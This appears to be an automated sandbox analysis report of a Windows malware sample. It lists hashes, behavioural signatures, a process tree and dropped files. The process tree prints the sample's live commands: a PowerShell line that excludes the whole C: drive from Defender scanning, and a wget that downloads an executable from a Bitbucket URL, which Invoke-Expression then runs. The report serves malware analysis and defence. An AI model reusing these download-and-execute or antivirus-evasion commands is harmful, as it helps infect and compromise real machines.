Analysis

  • max time kernel
    136s
  • max time network
    116s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-04-2024 18:22

General

  • Target

    d0738cea958412981be86082e38d44fb32696c319df92d21942b7bf22afa0055.exe

  • Size

    88KB

  • MD5

    6aeb9132bba916f4056093efd21137ac

  • SHA1

    437bfbc610896b14b7f88f0bd0bec6de4a36f4a4

  • SHA256

    d0738cea958412981be86082e38d44fb32696c319df92d21942b7bf22afa0055

  • SHA512

    cd79f6ee903f749f2ce62f3cdb9416fff2ca58c218a70e293c1e8fdfd7622b01d9959ba7316f33d53e2714df25d1c7142d14c989d7def2aeccf9c3f8d77ae262

  • SSDEEP

    1536:j7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfzxjOC:/q6+ouCpk2mpcWJ0r+QNTBfzL

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d0738cea958412981be86082e38d44fb32696c319df92d21942b7bf22afa0055.exe
    "C:\Users\Admin\AppData\Local\Temp\d0738cea958412981be86082e38d44fb32696c319df92d21942b7bf22afa0055.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4388
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2F6C.tmp\2F6D.tmp\2F6E.bat C:\Users\Admin\AppData\Local\Temp\d0738cea958412981be86082e38d44fb32696c319df92d21942b7bf22afa0055.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4856
      • C:\Windows\system32\cacls.exe
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        3⤵
          PID:2104
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath "'C:\'"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3352
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -command "wget "https://bitbucket.org/fwqffsfg/fasfwqfkuipo/downloads/qwercr.exe" -outfile "C:\Users\Admin\AppData\Roaming\2.exe"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4352
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -command "Invoke-Expression -Command "C:\Users\Admin\AppData\Roaming\2.exe"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4976
          • C:\Users\Admin\AppData\Roaming\2.exe
            "C:\Users\Admin\AppData\Roaming\2.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:4064
            • C:\Users\Admin\AppData\Roaming\2.exe
              "C:\Users\Admin\AppData\Roaming\2.exe"
              5⤵
              • Executes dropped EXE
              PID:4552

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      77d622bb1a5b250869a3238b9bc1402b

      SHA1

      d47f4003c2554b9dfc4c16f22460b331886b191b

      SHA256

      f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

      SHA512

      d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      e257260b10ea9343c9fdd46226191c7d

      SHA1

      ae0be0f0ab31806d9ddf93a51484ebdef22cd2f3

      SHA256

      9788fb800cd2994ced3087486fde7d63a42aa5911c062c5cb8c01c6eca20f8ec

      SHA512

      109ab33b93208c290c1a8db37570bffb70488ef4a5a7cc61c116ee7dbe1ec52dacc427641f000a19882d992219cc14cf360802179df4c73ea2aa83f6c358edde

    • C:\Users\Admin\AppData\Local\Temp\2F6C.tmp\2F6D.tmp\2F6E.bat

      Filesize

      965B

      MD5

      807466a799dce9079514f297e3f2f54e

      SHA1

      89bbbc8721dd2e5b70224310a526846aed30cd35

      SHA256

      c5b87feb66edbacb17c57131722e360323a24d67fdfd89beb2a71b839ba4de31

      SHA512

      cf9e2d3dbcc933f5dbb0abb6d945186988ec39914ceaad3dea8a18ce7916904366a8e280410b57c28e9b1870038d1b0e3fdb1eb7b6e75864443cf500841b575e

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dknstnin.gb1.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\2.exe

      Filesize

      11.6MB

      MD5

      74836117dfe81cc26e2dcd0aa1874ebb

      SHA1

      e95eb2ffd48e7df556f4751fb6197120d262dd30

      SHA256

      fa3b915b07fc6f2d928d398c3971f17efae1aec02e010c4f55fe264cb5d84564

      SHA512

      d0f406de04c29479ca9601d246eeb2bc6918f83a00b79525d56713b76c41c04c8ea760c3c464b0c04e43345386b0148c0631939a2c6a28ed81b9471b990df417

    • memory/3352-13-0x000001277DD90000-0x000001277DDA0000-memory.dmp

      Filesize

      64KB

    • memory/3352-16-0x00007FF9C2B40000-0x00007FF9C3601000-memory.dmp

      Filesize

      10.8MB

    • memory/3352-12-0x00007FF9C2B40000-0x00007FF9C3601000-memory.dmp

      Filesize

      10.8MB

    • memory/3352-2-0x000001277D8C0000-0x000001277D8E2000-memory.dmp

      Filesize

      136KB

    • memory/4064-54-0x0000000005F50000-0x0000000005F60000-memory.dmp

      Filesize

      64KB

    • memory/4064-53-0x0000000006510000-0x0000000006AB4000-memory.dmp

      Filesize

      5.6MB

    • memory/4064-52-0x0000000000960000-0x000000000150C000-memory.dmp

      Filesize

      11.7MB

    • memory/4064-61-0x0000000073A50000-0x0000000074200000-memory.dmp

      Filesize

      7.7MB

    • memory/4064-50-0x0000000073A50000-0x0000000074200000-memory.dmp

      Filesize

      7.7MB

    • memory/4352-20-0x00000206B8130000-0x00000206B8140000-memory.dmp

      Filesize

      64KB

    • memory/4352-33-0x00007FF9C2B40000-0x00007FF9C3601000-memory.dmp

      Filesize

      10.8MB

    • memory/4352-19-0x00000206B8130000-0x00000206B8140000-memory.dmp

      Filesize

      64KB

    • memory/4352-18-0x00007FF9C2B40000-0x00007FF9C3601000-memory.dmp

      Filesize

      10.8MB

    • memory/4552-58-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/4552-60-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/4552-59-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/4552-55-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/4976-34-0x00007FF9C2B40000-0x00007FF9C3601000-memory.dmp

      Filesize

      10.8MB

    • memory/4976-51-0x00007FF9C2B40000-0x00007FF9C3601000-memory.dmp

      Filesize

      10.8MB

    • memory/4976-35-0x000001F46C6E0000-0x000001F46C6F0000-memory.dmp

      Filesize

      64KB

    • memory/4976-36-0x000001F46C6E0000-0x000001F46C6F0000-memory.dmp

      Filesize

      64KB